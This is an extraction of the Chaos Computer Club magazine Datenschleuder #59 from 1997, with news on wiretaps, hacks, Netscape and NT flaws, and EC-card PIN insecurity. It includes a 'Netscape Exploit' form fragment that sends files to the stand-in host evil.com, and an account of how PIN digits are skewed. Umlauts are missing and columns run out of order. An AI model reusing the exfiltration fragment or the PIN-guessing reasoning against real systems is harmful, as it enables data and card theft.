Datenschleuder #59

8/9/2019 Datenschleuder #59

1/32

Die Datenschleuder

ISSN 0930-1045

Juni 1997, DM 5,00

Postvertriebsstck C11301F

Das wissenschaftliche Fachblatt fr Datenreisende

Ein Organ des Chaos Computer Club

#59

s Aktenzeichen ECungelst

s Neues von der Kryptofront

s Internetz endlich verboten

Ein Sicherheitsproblem bei ihrer EC-Karte

ist aufgetreten.

Geben Sie die Karte ihrer Bank zurck.

Gehen Sie nicht ber Los.

Ziehen sie keine Klage wegen Betrugs und

Vortuschung einer Straftat ein.

Neu!Jetz

tmito

hneCD-RO

M!


2/32

Die Datenschleuder

Nummer 59, Juni 1997

Adressensiehe a uch http:/ / w w w .ccc.de & de.org.ccc

Herausgeber:

(Abos, Adressnderungen etc.)Chaos Computer Club e.V.Schwenckestrasse 85D-20255 HamburgTel. 040-401801-0 /Fax. 040-4917689Mail: [email protected]

Redaktion:(Artikel, Leserbriefe etc.)Redaktion DatenschleuderPostfach 642 860D-10048 BerlinTel. 030-28354872/Fax. 030-28354878(Tel ndert sich vorr. demnchst)Mail: [email protected]

Druck: St. Pauli Druckerei Hamburg

ViSdP: Andy Mller-Maguhn

Mitarbeiter dieser Ausgabe:

Andreas, Bishop ([email protected]),Andy ([email protected]), Wau Holland([email protected]), Tim Pritlove([email protected]), Christine Schnfeld,Silke, Tobias ([email protected]),Zapf DingbatsEigentumsvorbehalt:Diese Zeitschrift ist solangeEigentum des Absenders, bis siedem Gefangenen persnlichausgehndigt worden ist. Zur-Habe-

Nahme ist keine persnlicheAushndigung im Sinne desVorbehalts. Wird die Zeitschrift demGefangenen nicht ausgehndigt, soist sie dem Absender mit demGrund der Nichtaushndigung inForm eines rechtsmittelfhigenBescheides zurckzusenden.Copyright (C) bei den AutorenAbdruck fr nichtgewerbliche

Zwecke bei Quellenangabe erlaubt.

Hamburg: Treff jeden Dienstag, 20 Uhr in den Clubrumen in der

Schwenckestr. 85 oder im griechischen Restaurant gegenber. U-BahnOsterstrasse / Tel. (040) 401801-0, Fax (040) 4917689, Mail: [email protected]

Berlin: Treff jeden Dienstag ca. 20 Uhr in den Clubrumen, NeueSchnhauser Str. 20, Vorderhaus ganz oben. S-/U-Alexanderplatz, S-Hackescher Markt oder U-Weinmeisterstr. Tel. (030) 28354870, Fax (030)28354878, Mail: [email protected]. Briefpost: CCC Berlin, Postfach 642 860,D-10048 Berlin Chaosradio auf Fritz i.d.R. am letzten Mittwoch imMonat von 22.00-01.00 Uhr.

Sachsen/Leipzig: Treffen jeden Dienstag ab 19 Uhr im Caf Ambiente,Petersteinweg, Nhe Neues Rathaus/Hauptpolizeiwache. Veranstaltun-

gen werden p. Mail ber d. Sachsen-Verteiler (Uni-Leipz) angekndigt.Infos f. Neueinsteiger gibts von [email protected] /Briefpost:Virtueller CCC-Sachsen, c/o Frohburger Medienhaus, Leipziger Str. 3,04654 Frohburg, Tel: (034348)51153, Fax (034348)51024, Mail:[email protected], http://www.sachsen.ccc.de

Kln: Ab 1. Juli Treff jeden Dienstag um 19:30 bei Abgang! in derHndelstrasse 19. Telefonischer Kontakt via 0177-2605262.

Mnchengladbach: Treff: Surfers Paradise, Bahner 19 in Mnchenglad-bach vorerst einmal im Monat jeden letzten Freitag, Ab 1. August dannimmer Dienstags um 20 Uhr. Mail: [email protected]

Bielefeld: FoeBud e.V., Treff jeden Dienstag um 19:30 im Cafe Durst inder Heeperstr. 64. Monatliche Public Domain Veranstaltung, sieheMailbox. Briefpost: Foebud e.V., Marktstr. 18, D-33602 Bielefeld, Fax.(0521) 61172, Mailbox (0521) 68000 und Telefon-Hotline Mo-Fr 17-19Uhr (0521) 175254. Mail [email protected]

Lbeck: Treff am ersten und dritten Freitag im Monat um 19 Uhr imShortys, Kronsforder Allee 3a. mail: [email protected],http://www.on-lbeck.de/bscher/ccc.html, Briefpost: CCC-HL c/oBenno Fischer, Bugenhagenstr. 7, D-23568 Lbeck. Tel. (0451) 3882220,Fax. (0451) 3882221

Ulm: Treff jeden Montag um 19 Uhr im Cafe Einstein an der Uni Ulm.Kontakt: [email protected]

Stuttgart: Computerunde Scrates, Mail [email protected]

Frankfurt/Mainz: kriegen sich noch nicht zusammengerauft. Wird dasbald mal was?!

sterreich: Engagierte ComputerexpertInnen,Postfach 168, A-1015 Wien

USA: 2600 siehe http://www.2600.com

ImpressumDie Datenschleuder Nr. 59Quartal I, Juni 1997


3/32

Index

3 - G10 Statistik inofziel verffentlicht

- Europ. IN-provider ham Schnauze voll4 - Biologische Kriegsfhrung: USA vs. Kuba

- Masterspy Turned out Schoolboy Hacker5 - Sex-Straftter am Internet-Pranger

- Hackers hit Polish prime minister- Japan:Hacker replaced weather with Porn

6 - Netscape Security Flaw is a feature- Netscape Exploit

7 - Netscape privacy problem reduced- NT Insecurity

8 - Absolution fr Ladendiebe

- Pay per view execution?

Liebe Datenschleuder Leser,

das Prinzip der Dezentralitt und Diskordinitt (und leider auch der Diskoordinitt ;-)begleitet diesen Computer Club jetzt schon seit mehr als ein Jahrzehnt. Die Dynamik desLebens, gekoppelt mit der Erfrischung der Wiedersprche und hnlichen Zutaten waren

bislang ein mehr oder weniger gutes Rezept das Chaos aufrechtzuerhalten.

Ob wir allerdings mit der wachsenden Relevanz unserer Themen (z.B. diese bldenComputer & ihre Auswirkungen auf das menschliche Leben) unsere Diskoordinitt auch bei-

behalten sollten, steht momentan mal wieder zur diskordischen Diskussion.Professionalisierung als Gebot der Stunde? Machtbernahme? Forschungszentrum fr kyber-netische Hebelermittlung? Stiftung fr hochbegabte aber sozial extraterristisch orientierte

Jugendliche? Lobbyarbeit? Partei grnden? Genossenschaft aller CCC nahen Firmen?Bundesregierung wegprogrammieren? Internet endlich als Land bei der UN anmelden unddahin ziehen?

Informationsfreiheit ist leicht gesagt und schwer verwirklicht. Unser Layouter z.B. hat sichvon der letzten Datenschleuder noch nicht erholt und vor Fertigstellung dieser erstmal dieFlucht ergriffen und sich in den Urlaub abgesetzt. Der fr Beschreibung derartigerSachverhalte zustndige Redakteur fr die Katastrophenberichterstattung wurde das letztemal beim packen seines Wohnmobils gesehen. Und das Resultat von alldem?

Haltet ihr in den Hnden.Trotzdem gibt es hoffnungsvolle Anstze, mit dem Chaos bald die Welt zu regieren. Kritiker

behaupten, wir wrden das lngst tun. Effektivere Manahmen ergreift in diesem Sinnejedoch eher die Bundesregierung: erlt Multimedia- Gesetze die eigentlich alles unklarewie z.B. Verantwortlichkeiten regeln sollen, in erster Linie aber deutlich dokumentieren, dadie Verantwortlichen das Internet gar nicht begriffen haben und in der Konsequenz einRiesen-Chaos anrichten. In diesem Sinne gibt es viel zu tun. Lasst uns bloss wegfahrn. NachHolland zum Beispiel (siehe Seite 31).rt,eure Stimme aus dem Chaos

Die Datenschleuder


Editorial

W ir Diskordier mssen auseinanderhalten.. .

9 - EC-Karten Unsicherheit11 - Gutachten von Prof. Pausch zum EC-PIN21 - Algorithmus zur Generierung der PIN22 - OVst-Watch: Beobachtungen am T-Netz

23 - Gesetze gegen Code-Knacker geplant- Bundestag zur Lage der IT-Sicherheit

24 - DES noch nicht tot, stinkt aber schon- USA: Kontrolleinschrnkungssimulation

26 - ...It doesnt change things at all- PGP darf exportiert werden- Alert: Senate to vote on...key escrow

27 - RSA/CRT: One strike and youre out!28 - SET auch durch29 - Das Allerletzte...30 - Termine / HOPE II / HIP97 / CCC-MV31 - Bestellfetzen


4/32

France Telecom and British Telecom. EuNet

has already led one complaint last month,against Belgiums national carrier Belgacom.Outside the EU, the company has won a caseagainst Swiss PTT over unfair subsidies to itsown online service, Helsingius said.Belgacom has shown discriminatory practicetoward us on almost everything, includingdelaying on deliverables withoutexplanation, Helsingius said at a Europeanchief executives conference organized by the

Wall Street Journal here. Theres no decisionyet, because the commission is stillinvestigating the case.

The EC regulates competition in the 15countries of the European Union. But that[the complaint against Belgacom] is just apilot, Helsingius added. We have a box fullof other complaints against incumbent opera-tors in Germany, the United Kingdom andFrance. In Germany, Deutsche Telekom is so

strong in the market that they just dominate.EuNet International, which runs its ownInternet backbone but needs to interconnectwith local networks, is also unhappy with itstreatment from Dutch operator PTTNederland, Helsingius said, but he added:They are not the worst offenders ECcompetition ofcials declined to conrmwhether the commission will launch a fullinvestigation over the Belgacom case.

We are doing our duty, and Belgacom knowsus very well, said one senior competitionofcial, who could not be quoted by name.

Complaints against European nationaltelephone companies by ISPs and byindependent telecom carriers are expected toincrease during the next six months, as theEU prepares for the liberalization of telecommarkets in January 1998.

But though the European telecom services

Die Datenschleuder


Kurzmeldungen

Deutschland

1996 soviele Telefone abgehrt wieniemals zuvor

Das Bundeskriminalamt und die Bundesan-waltschaft haben im vergangenen Jahr sovieleTelefone abhren lassen wie nie zuvor.Demnach wurden insgesamt 4674 festinstallierte Anschlsse mit richterlicherGenehmigung angezapft.

Das seien 27,5 Prozent mehr als im Vorjahrgewesen. Auch die Zahl der berwachtenFunk-Telefone erreichte mit 1929 abgehrtenMobilanschlssen Rekordhhe. DieAbhraktionen kosteten insgesamt weit mehrals eine Million Mark.AFP/Bild 15.05.1997

Europa

Internet Provider Takes On TopEuropean Carriers

One of Europes leading independent Internetservice providers is to launch anti-trustactions against the European Unions topthree telecommunications carriers.

EuNet International, a Dutch-based ISP, saidTuesday it is set to launch a slate of

complaints to the European Commission overalleged dirty tricks including abuse ofdominant market position and unexplaineddelays to services promised to EuNet bytop EU telecom carriers attempting to protecttheir online service business against the inde-pendent ISPs.

EuNet International product developmentdirector Johan Helsingius said his companywill le complaints to the European

Commission against Deutsche Telekom,


5/32

Internet

Masterspy Turned Out to beSchoolboy HackerLONDON - A masterspy believed by thePentagon to be the No. 1threat to U.S.

security and deadlierthan the KGB turnedout to be a Britishschoolboy hacker wor-king out of his

bedroom. U.S. military

chiefs feared that anEast European spyring had gained accessto their innermostintelligence secretsand hacked intoAmerican Air Defensesystems.

But a 13-month investigation and a dramaticpolice raid on his London home revealed that

16-year-old music student Richard Pryce wasthe culprit. Pryce, known on the internet asThe Datastream Cowboy, was ned $1,915Friday by a London court after what hislawyer calleda schoolboy prankreminiscentof the movie War Games. The U.S. Senatearmed services committee was told themystery hacker was the number one threat toU.S. security. He was said to have downloadeddozens of secret les, including details of theresearch and development of ballistic missiles.

Up to 200 security breaches were logged.Using a $1,200 computer and modem, Prycehacked into computers at Grifss Air Base inNew York and a network in California run bythe missile and aircraft manufacturerLockheed. Those places were a lot easier toget into than university computers inEngland, Pryce told reporters. It was moreof a challenge really, going somewhere I was-nt meant to. If you set out to go somewhere

and you get there, other hackers would be

market is supposed to be open to competition

by January next year, the EC has yet to workout how it will treat Net-based services such as Internet telephony which compete

directly with traditional carriers. The EC saidin May it was setting up a special unit to dealwith complaints of anti-competitive behavior inthe run-up to liberalizati-on of the telecommarket.

Peter Chapman, Techwire06.04.1997(Johan Helsingius aka Julfwar ber lange Jahrehinweg der Betreiber vonanon.penet.)

Planet Erde

Biologische Kriegsfhrung:Kuba beschuldigt USA

Laut CNN-Web vom 15.5.1997 sehen sichkubanische Farmer derzeit mit einemProblem konfrontiert, das sie bislang nur mitder Lupe erkennen knnen: ihre Ernte wirddurch einen winzigen Schdling namensThryps palmi bedroht. Smtliche Pestizidehaben sich als ineffektiv erwiesen. Das Insekthat bereits einen erheblichen Teil der kuba-nischen Gemseernte (Kohl, Tomaten,

Gurken, Bohnen) befallen, so da massivePreisanstiege zu erwarten sind, wenn dieInsektenplage anhlt.

Die kubanische Regierung wirft den USA bio-logische Kriegsfhrung vor. Ein US-Flugzeugsoll den Schdling im letzten Oktober berKuba ausgesetzt haben. Washingtondementiert.

Die Meldung war einen halben Tag auf dem CNN-Server und verschwand dann...

Die Datenschleuder


Chaos Realitts Abgleich


6/32

altering its heading to read Hackpublic of

Poland and Government DisinformationCenter, a newspaper reported Wednesday.Internet users seeking information from theprime ministers ofce found themselvesreferred to the site of Playboy magazine bythe unknown hacker, who signed him orherself Damage.Inc, the daily GazetaWyborcza said. An ofcial in the ofce whichproduced the government website toldReuters Wednesday it had been withdrawnpending the provision of new security

codes.A copy of the altered version could stillbe viewed onhttp://www.software.com.pl/intdev/news/welcomep.html, the server of the Net SecurityInstitute (IBS) in Warsaw. The newspaperquoted government spokeswomanAleksandra Jakubowska as saying that thecabinet website was not connected to thegovernments internal computer network sothere was no danger of using the internet to

access government secrets.Reuter 07.05.1997

Internet

Japan police say hacker replacedweather with porn

TOKYO, (23.05.1997/Reuter) - Japanesepolice on Friday arrested a 27-year-old

computer engineer suspected of replacingpublic weather charts on the Internet withpornographic pictures. A spokesman forOsaka police said Koichi Kubojima, a residentof the northern Tokyo suburb of Fujimi, wasthe rst person in Japan to be arrested forsuspected violation of a 1987 anti-hacker law.

Kubojima is accused of taking over sevenweb pages of the Osaka-based televisionnetwork Asahi Broadcasting Company on

May 18 and replacing ve of the seven

Die Datenschleuder


Kurzmeldungen

impressed, he said. His prank put Pryce on

the front pages of most British newspapersSaturday with tales of The Schoolboymasterspy and The Boy who cracked openthe Pentagon.

Pryce, now 19, has been offered sizeable sumsfor the book and lm rights to his story buthis parents say he prefers to stick to hisdouble bass and concentrate on winning aplace in a leading London orchestra.

Quite remarkably in a society dominated by

sleaze, he has refused all the offers and wantsxto resume his quiet life, said his father,Nick Robertson. His computer skills were notreected in his exam results he was onlyawarded a D grade.

Reuter 22.03.1997

Internet

Sex-Straftter am Internet-PrangerSeattle - Sex-Straftter stehen im US-Bundes-

staat Alaska nach ihrer Haftentlassung amelektronischen Pranger. Wer wegenVergewaltigung, Kindesmibrauch oderVerbreitung von Pornographie verurteilt wur-de, wird mit Namen und Adresse auf einerneuen Webseite angegeben. Sie sei ein vollerErfolg, sagte die Polizei in Anchorage. In denersten 24 Stunden seit ihrer Einrichtung seisie fast 4000 mal angewhlt worden. Wie invielen anderen US-Bundesstaaten sollten die

Brger durch die Verffentlichung wissen,wer in ihrer Mitte wohne.

dpa 13.06.1997

Internet

Hackers hit Polish prime ministerswebsite

WARSAW - A hacker broke into the Polish

cabinets internet website over the weekend,


7/32

According to Netscape spokesmen, this

feature was added to the kernel of Mosaic,then Navigator, in 1993, as part of the ClipperKey Recovery Program. As James Clarke putit an interview tonight on MSNBC, DorothyDenning asked us to insert the remote readcapabilities to ensure that the legitimateneeds of law enforcement are met. No personcruising the Web has any expectation ofprivacy, as even Declan McCullagh haspointed out. Marc Rotenberg commented,

Privacy at the individual user level isunimportant, just so long as a PrivacyOmbudsman can decide on the legitimateneeds of law enforcement.

Meanwhile, Microsoft has acknowledge thatall lines to its Redmond site are clogged bypeople dumping Navigator and trying todownload Explorer.

Tim May, [email protected]

Netscape ExploitHere is a sample it isnt complete but you getthe basic idea of what is going on

Evil-DOT-COMHomepage

NAME=daForm

ACTION=http://evil.com/cgi-bin/formmail.pl

METHOD=POST


8/32

whenever a site tries to upload a form, giving

the user a chance to decide whether to allowit.

* Also, in Navigator 3.x and 2.x, go to theOptions menu and select NetworkPreferences. Turn OFF the Enable

JavaScript preference. This will blockexecution of JavaScript code which might tryto perform an invisible le upload, while per-mitting display of the rest of the page.These

measures are temporary until a full bug x ismade available by Netscape and provenagainst the EIFIST demo page.

Regards

NT InsecurityIn order to expose theaw and demonstratethese potential vulneabilities,NTsecurity.com

created a program toolcalled RedButton. Whenexecuted, RedButtonexploits the aw anddoes the following: - logson remotely to a Target

computer without presenting any User Nameand Password- gains access to the resourcespublished to Everyone - determines thecurrent name of Built-in Administratoraccount (thus demonstrating that it is uselessto rename it) - reads several registry entries(i.e. it displays the name of RegisteredOwner) - lists all shares (including the hiddenones) RedButton is not an intruders tool, andit does not increase any security risks orvulnerability. However, it demonstrates howa potential intruder can exploit an NT system.

http://www.ntsecurity.com/RedButton/index.htm

Die Datenschleuder


Kurzmeldungen

...Bugs...

Netscape privacy problem reproduced

Using information gleaned from the web siteof the Danish company that rst reported theproblem, Keith Woodard and DaveHumphrey at EIFIST have built a web pagewhich reproduces the privacy problem inNetscape Navigator and Communicator web

browsers. From that effort they have

developed a better understanding of how theNetscape bug works, and what defensivemeasures users can take until a bugx is avai-lable from Netscape. First, the problem isindeed read-only, and involves only les towhich the explicit path nameis known. Second, all lesystems accessible from theNetscape users system arereachable that meansmapped network drives as well

as the local hard disk. Third,JavaScript can be used by aweb site to automate reading ausers le so that it is invisibleto the user. However, the bugdoes not involve use of Java atall.

The demo website can be visited at thefollowing URL:

http://eist.frb.org/hacker/leupload.html

Please urge all Internet web users to take thefollowing interim steps until a permanent xis available from Netscape:

* In Navigator 3.x and 2.x, go to the Optionsmenu and select Security Preferences. Selectthe Submitting a Form Insecurely preferen-ce to enable that warning dialog box. This

will generate a warning box


9/32

victims. To make an execution public like in the case

of Tim McVeigh, would be like returning to the 15thcentury. Arguably, in the case of Oklahoma City bom-bing, the victims were random Americans, and byextension each resident of the U.S. can be considered

their relative,proponents of thetelevised executionmay say. However,public was never inthe entire historyCHARGED to viewan execution. Howmany people wouldactually pay to watch

Timothy die? Imagine after a day of hard work, yourelax on your couch, pop up a beer can and order anice pay-per-view execution. Watch him die in privacyand convenience of your own apartment. How muchshould it cost? How much would people be willing topay? Should the victims and their relatives be paidroyalties - I mean, their suffering brought down the

sentence and the execution, but they did not activelyparticipate in the business. Will cable companies letthem watch execution for free, or at some discount atleast? Bizarre as it is - introduction of pay-per-viewexecutions may reduce the backlog on the death row:now, when there is money to be made, maybe therewill be state licensed lethal injection privatepractitioners (Kevorkian, as a person with immenseexperience, should apply), and the process of deliver-ing justice may speed up considerably.

http://www.peacenet.org/balkans/# Ursprung : /APC/GEN/RADIO## Ersteller: [email protected]

PO Box 46, NYC NY 10029, USA

Evolution

Absolution fr LadendiebeSupermrkte seien wie Krebsgeschwre frdas soziale Leben in den Stdten, meint deranglikanische Geistliche

John Papworth. Deshalbsei Ladendiebstahlkeine Snde. Die Kirchevon England reagierteebenso ungehalten wie

Supermarktketten undder britischeInnenminister. DochPapworth lt sich nicht

beirren: Jesus habe zwar Nchstenliebe gepre-digt, er habe aber nicht gesagt: Du sollstMarks und Spencer lieben, sagte derGeistliche in Anspielung eine britischeSupermarktkette.

Quelle: CriminalDigest 2/97

De-Evolution

Pay per view execution?In the U.S. Timothy McVeigh might get a pay-per-viewexecution prime time In middle ages executions werepopular spectacles: it was a way for powerful (nobles,kings, church, etc.) to show their power in mostagrant way to the peasants and just ordinary plebs. Itwas also a way for the public to participate in thepunishment of the perceived evil - whether it was a

real Jeffrey Dahmer like psycho, or a woman accusedfor witchcraft. Watching the criminal die for his/herscrimes or sins works cathartic on people. It alsoreinforces the public belief in justice, order and the sta-te. Only later in our development as humans did wedecide that an execution is actually a state sponsoredmurder, and no murder is justied under the rule ofGod, so, therefore, while many governments did notdispense off death penalty, they usually restrainedthemselves from televising executions and instead sho-

wing them just to the close range of relatives of

Die Datenschleuder


Chaos Realitts Abgleich


10/32

Pausch-Gutachten seine (!) Serisitt

anzweifelten. Unter dem Motto: nicht maldie haben es geschafft, die Informationen zubekommen....

Diese Details und etliche andere kamenjedoch erst in den letzten Wochen zum Vor-schein, nachdem ein spektakulres Gerichts-urteil des OLG Hamm am 17.03.1997Bewegung in die Sache brachte. Unter demAktenzeichen 31 U 72 / 96 und der - leidererst Mitte Mai verfgbaren Urteilsbegrn-dung (2) - wurde nicht nur auf Oberlandes-gerichtsebene in einem nicht-revisionsfhigen

Urteil die Ermittelbarkeit aufgrund derKartendaten besttigt, sondern auch gleichdie Beweislastfrage auf die fallspezischenRandhandlungen bezogen. Ausschlaggebendwar wiederum ein Gutachten des Prof. Dr.Pausch, der allerdings diesmal wesentlichausfhrlicher die ihm bekannten Mglichkei-ten aufzeigte, wie ein Dieb den PIN-Codeermitteln knne.

Das nachstehend (mit freundlicher Genehmi-gung von Prof. Dr. Pausch) abgedruckteGutachten spricht fr sich und bringtdeutliche Beleuchtung in den Sachverhalt.Die Feststellung, da die Mglichkeit desErratens des PIN-Codes mit einerWahrscheinlichkeit von 1:150 aufgrund un-gleichmssiger Verteilung anderer Detailsmglich ist, wurde beim OLG-Hamm sogarvon Herrn Dr. Heuser vom Bundesamt frSicherheit in der Informationstechnik (BSI)

besttigt.

Herr Dr. Heuser versprach brigens einemMitarbeiter der Datenschleuder zwar die

umgehende Zusendung seines Gutachtens,dies erreichte uns jedoch auch nach 4 Wochennicht. Mittlerweile sind von mehreren unab-hngigen Quellen Hinweise auf die Motivedes BSI aufgetaucht, nach 15 (!) Jahren dielngst bekannte Unsicherheit des EC-Kartenverfahrens teilweise einzugestehen.Das BSI, so heit es, arbeitet an einer chip-kartenbasierten Lsung fr rechtsverbind-liche elektronische Unterschriften (Authen-tizierung) nach der jngst verabschiedetenSignaturgesetzgebung des Multimedia-

Gesetzes aus dem Hause Rttgers (BMBF).Wre ja auch komisch, wenn sich das

Die Datenschleuder


Bereits in der Datenschleuder Nummer 53 im

Dezember 1995 wurde der Leser in einemeinen lngeren Artikel ber die Verbraucher-schutz-Problematik der EC-Karte aufgeklrt.Im Kern besteht das Problem in der sog.Sorgfaltspicht des Kunden zum Umgangmit dem PIN-Code, welcher zu seiner EC-Karte gehrt.

Der Kunde ist verpichtet, diesen PIN-Codeniemandem mitzuteilen, ihn nicht zusammenmit der Karte aufzubewahren, ihn nicht aufdie EC-Karte selbst zu schreiben und so fort.Wird nun jemand seine EC-Karte z.B. mit sei-

nem kompletten Portemonaie geklaut und eskommt, bevor er die Karte ber den zentralenSperrdienst in Frankfurt sperrt, zu Abhebun-gen, hat er ein Problem. Konkret muss erseiner Bank beweisen, da er seiner Sorgfalts-picht nachgekommen ist, also seinemgeklauten Portemonaie kein Zettel mit seinemPIN-Code beilag. Die Banken argumentierten

bisher mit der Unmglichkeit, von den Datendes Magnetstreifens auf den PIN-Code zukommen. Sie verdchtigen standartmssig imGegensatz den Kunden, den Diebstahl derKarte nur vorgetuscht zu haben und dieAbhebungen selbst gettigt zu haben, bzw.als Mittter diese mitgeteilt zu haben.

Auch wenn der Algorithmus und dieVorgehensweise, wie aus den Kartendatender PIN berechnet wird schon lnger bekanntist, gelang der Beweis der Berechnung bishereher nicht und Gerichtsverfahren gingenentsprechend verbraucherungnstig aus.

Lediglich in einem Gerichtsverfahren von1988 (AZ 36C4386/87) in denen Prof. Dr.Pausch in einem Gutachten ermittelte, das

der PIN-Code sehr wohl unter bestimmtenVorraussetzungen ermittelbar war, bekam diebetroffene Kundin recht. In der Datenschleu-der 53 versprach ich damals mehr ber dasGutachten von Pausch und das Urteil inErfahrung zu bringen, was aufgrund akutenChaos auf anderen Baustellen (CCC95 undFolgen) unterblieb. Dies ist insofern im nach-hinein wichtig, als das der DS-Artikel in meh-reren Gerichtsverfahren als Beweismaterialeingereicht wurde und die Banken dann mitVerweis auf den versprochenen aber

fehlenden Folgeartikel mit den Details vom

EC-Karten Unsicherheit


11/32

staatliche BSI sich uneigenntzig gegen die

Banken wenden wrde...Doch zurck zur Unsicherheit des EC-Systems. Die Wahrscheinlichkeitsaussage

beruht auf der Art und Weise der internenUmrechnung und einer Besonderheit. DieBesonderheit ist, dass die erste Ziffer der PINniemals eine 0 ist, tritt eine 0 im Rechen-proze als Ergebnis aus wird daraus eine 1gemacht. Die Art und Weise der Umrechnungist die Umwandlung der internen Hex-Werte(0-9 & A-F) auf Dezimalziffern (0-9): aus A-F wird wiederum 0-5 nach Modulo 10:

A=0, B=1 etc. - und aus A=0 wird bei derersten Ziffer wiederum aus 0 eine 1 weil die 0per Denition hier nicht erlaubt ist. So tretenan 1. Stelle die Ziffern 0,1,A,B vier mal sohug auf wie andere, die Ziffern 1-5insgesamt bei den anderen Stellen jedochdoppelt so hug auf wie die anderen. Damittreten bestimmte PINs huger auf als ande-re (Errechnungen dem Leser vorbehalten).

Reaktionen

Die Banken konzentrieren sich in ihrerReaktion derweil auf Nebelwerfen undMauern - nebst Umstellung auf ein neuesPIN-Verfahren. Das betroffene Institut desOLG-Hamm Urteils, die Postbank, verwei-gert z.B. eine eigene Stellungnahme (3) undverweist auf den Zentralen Kreditausschu(ZKA). Dieser wiederum versucht mitnebulsen Angaben die Urteilsbegrndungund den Gutachter zu diskreditieren.

So behauptet der ZKA (4) beispielsweise,[...] Viele Karten verfgen ber gar keine

gltigen Offset-Werte mehr, da diese Werte frdie berprfung der PIN heute nicht mehrbentigt werden. Der angenommeneWahrscheinlichkeitswert fr ein Erraten der PINist daher nicht zutreffend.. Implizit wird(aufgrund des Zwecks des Offsets; der Offsetistder (Zahlen-)wert, der dem Rechenergebnisdes Poolschlssels hinzugefgt wird, wennder Institutsschlssel nicht vorliegt) damit

behauptet, es gbe quasi keine ofine-betriebene GAA mehr, was allerdingssachlich falsch ist. So sind nicht nur ofine-

Zeiten von GAA aufgrund der Umbuchungvom technischen auf den juristischen

Die Datenschleuder


AZ 31 U 72 / 96 und folgen

Datenbestand bekannt, sondern auch

weiterhin (ofine) GAA im (europischen)Ausland; auch berichtete Pausch auf der alaCard Konferenz in Hamburg von einem Fallvon einer westdeutschen Grostadt im Mai1997, wo ein Bagger versehentlich dieKabelverbindungen eines GAA wegri unddieser trotzdem noch ec-Karten akzeptierteund bei richtigem PIN Geld ausspuckte.Bankenvertreter rumten auf selbigerKonferenz in der Diskussion brigens ein,man knne ja auch nicht im Ofine-Falleinfach die Auszahlung verweigern; manstelle sich den Kunden im Ausland vor, derauf einmal kein Bargeld bekommt oder imRestaurant sein Essen nicht bezahlen kann...

Eine richtige Sachinformation enthlt dieZKA-Stellungnahme dann brigens dochnoch: Darber hinaus werden alle Verfgungenund Verfhrungsversuche mit falscher PIN proto-kolliert, so da Angriffe, die auf einemAusprobieren von PIN beruhen, nachvollzogenund eindeutig erkannt werden knnen. (dieFrage ist nur wo, wann und durch wen!)sowie die Folgerung (wenn man sich dieEinschrnkung hinzudenkt, dass dies nur

beim online-Betrieb berhaupt sein kann),da Auch eine Vernderung desFehlbedienungszhlers auf der Karte fhrt dahernicht zu einer beliebig hohen Zahl von PIN-Versuchen..

Ganz zufllig, vllig unabhngig von diesenGeschehnissen und in berhaupt keinemZusammenhang stehend (;-) verkndet unsein Artikel in der FAZ vom 27.05.1997, dannda noch dieses Jahr alle ec-Karten eine neuePIN zugewiesen bekommen. Auf dem Weg

zur Abschaffung des 56-bit Poolschlsselsund ofine-GAA hin zu 128-Bit Instituts-schlsseln und der Mglichkeit, seinen PINselbst zu ndern gibt es zweiSchritte.

Zunchst erhalten die ec-Karten Kunden eineneue PIN mitgeteilt, die zum Tag X gilt. Dannim zweiten Schritt (ca. 1998) kann der Kundedie (neue) PIN selbst ndern (auf 4-12numerische Ziffern). Nach einer bergangs-zeit mit zwei gleichzeitig gltigen PINs (alsoder bisherigen (!) und der neuen, zunchstnicht aber spter vernderbaren) von drei bis

fnf Monaten stirbt dann die alte PIN und


12/32

Die Datenschleuder



Spur 3 des Magnetstreifens wird gelscht

(Offsets etc.). Ofine-Autorisierung gibt esdann nur noch mit Chipkartenfunktion; dasheit in die elektronische Geldbrse wirdeine Authorisierungsfunktion fr die EC-Karte eingebaut. (Ist sie aber in den jetzt

bereits ausgegebenen Karten noch nicht.)

Die entscheidende technische Schwachstelledes EC-Kartensystems ist und bleibt der 56-

bit DES Pool-Schlssel. Das haben offenbarauch die Banken erkannt, erklrt dieVorgehensweise nach FAZ. Zustzlich solltemensch wissen, da der Pool-Schlssel, der

(siehe Schema) die Errechenbarkeit des PIN-Codes zu *jeder* EC-Karte (mit dem Offset)ermglicht, seit Einfhrung des EC-Kartensystems nicht gendert wurde.

Im Sinne der Evolution

Um die unheilsvolle Behauptung der Banken,der PIN sei aufgrund der Kartendaten nichterrechenbar ein fr alle mal in den Bereichder Unwahrheit zu rcken - und somit dieHaftungsfrage zu lsen und sich nicht mitden kosmetischen Spielerein zufriedenzuge-

ben, entstand im CCC die Idee, den 56-BitPoolschlssel doch einfach zu knacken. Unddas steht jetzt als Projekt an. Konkret habenwir uns dazu entschlossen, eine Schlssel-knackmaschine zu bauen (verteiltes Rechnendauert zu lange). Die Detailfragen, etwa obwir uns mit ASICs auf eine kostengnstige-re, aber auf 56bitDES beschrnkt Lsung ein-lassen oder mit FPGAs eine exiblere, aberaufwendigere und teurere Maschine konstru-ieren benden sich in der Diskussion (z.B.de.org.ccc). Auf der HIP97 Konferenz inHolland (siehe diese Datenschleuder) soll die

Konstruktionsdiskussion ffentlich gefhrtund die Entscheidungsndung baldmglichstabgeschlossen werden.

Abgesehen von den nicht ganz kleinentechnischen Problemen, die im Rahmen desProjektes zu lsen sind gibt es natrlich nochein nanzielles. Unter Bercksichtigung desZeitdrucks (Pool-Schlssel mu noch dieses

Jahr vorliegen, bzw [...selberdenken...]), derzu lsenden technischen Probleme (ASIC-Erstellung bzw. FPGA-Programmierung,Lieferzeiten, Stromversorgung (!), Bussystem)

ist das Projekt unter 1 Million DM mit den

zur Verfgung stehenden Ressourcen schwer-

lich zu lsen. Nach 2 Wochen Diskussionhaben wir uns zmd. von jeglichenselberlten-Lsungen entfernt undOutsourcing von Teilaufgaben (Hardware) alssinnvoll befunden.

Wo das Geld hernehmen?

Um es gleich klarzustellen: die Aktion ndetin Kooperation mit Verbraucherschutz-verbnden und Rechtsanwlten statt umunzweifelhafte legale Aktivitt im Sinne desVerbraucherschutzes sicherzustellen. Es geht

